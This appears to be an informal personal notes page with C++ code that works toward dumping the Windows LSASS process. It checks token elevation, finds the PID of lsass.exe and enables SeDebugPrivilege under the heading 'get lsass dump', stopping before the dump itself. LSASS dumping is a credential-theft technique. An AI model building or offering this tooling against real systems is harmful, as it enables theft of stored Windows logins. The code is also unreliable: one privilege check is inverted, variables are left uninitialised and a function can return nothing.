my first english page

access tokens

https://learn.microsoft.com/en-us/windows/win32/secauthz/access-tokens

Handles and objects 

https://learn.microsoft.com/en-us/windows/win32/sysinfo/handles-and-objects

OpenProcessToken function

https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocesstoken

Access Rights for Access-Token Objects

https://learn.microsoft.com/en-us/windows/win32/secauthz/access-rights-for-access-token-objects

Function one:Confirm if you have administrator rights

#include <iostream>
#include "Windows.h"
using namespace std;

bool isElevatedProcess() {
    bool isElevated;
    HANDLE access_token;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &access_token)) {
        TOKEN_ELEVATION elevation;
        DWORD token_check = sizeof(TOKEN_ELEVATION);
        if (GetTokenInformation(access_token, TokenElevation, &elevation, sizeof(elevation), &token_check)) {
            isElevated = elevation.TokenIsElevated;
        }
    }
    if (access_token) {
        CloseHandle(access_token);
    }
    return isElevated;
}


int main()
{
    if (isElevatedProcess()) {
        printf("admin");
    }
    else {
        printf("no");
    }
    getchar();
}

function two：get process PID

CreateToolhelp32Snapshot

https://learn.microsoft.com/zh-cn/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot

DWORD GetProcessIDByName(const wstring& processName) {
    DWORD ProcessID;
    HANDLE  snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if (snapshot != INVALID_HANDLE_VALUE) {
        PROCESSENTRY32 processEntry = {}; 
        processEntry.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(snapshot, &processEntry)) {
            do {
                wstring currentProcessName(processEntry.szExeFile);
                if (currentProcessName == processName) {
                    ProcessID = processEntry.th32ProcessID;
                    break;
                }
            } while (Process32Next(snapshot, &processEntry));
        }
        CloseHandle(snapshot);
    }
    return ProcessID;
}

    wstring ProcessName = L"lsass.exe";
    DWORD processPID = GetProcessIDByName(ProcessName);
    printf("lsass.exe PID:%d", processPID);

function three：get lsass dump

bool setPrivilege() {
    string priv_name = "SeDebugPrivilege";
    wstring privilege_name(priv_name.begin(), priv_name.end());
    const wchar_t* privName = privilege_name.c_str();
    TOKEN_PRIVILEGES priv = { 0,0,0,0 };
    HANDLE tokenPriv = NULL;
    LUID luid = { 0,0 };
    bool status = true;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &tokenPriv)) {
        status = false;
        goto EXIT;
    }
    if (!LookupPrivilegeValueW(0, privName, &luid)) {
        status = false;
        goto EXIT;
    }
    priv.PrivilegeCount = 1;
    priv.Privileges[0].Luid = luid;
    priv.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : SE_PRIVILEGE_REMOVED;

    if (!AdjustTokenPrivileges(tokenPriv, false, &priv, 0, 0, 0)) {
        status = false;
        goto EXIT;
    }
EXIT:
    if(tokenPriv)
    {
        CloseHandle(tokenPriv);
        return status;
    }


}

what is handle in cpp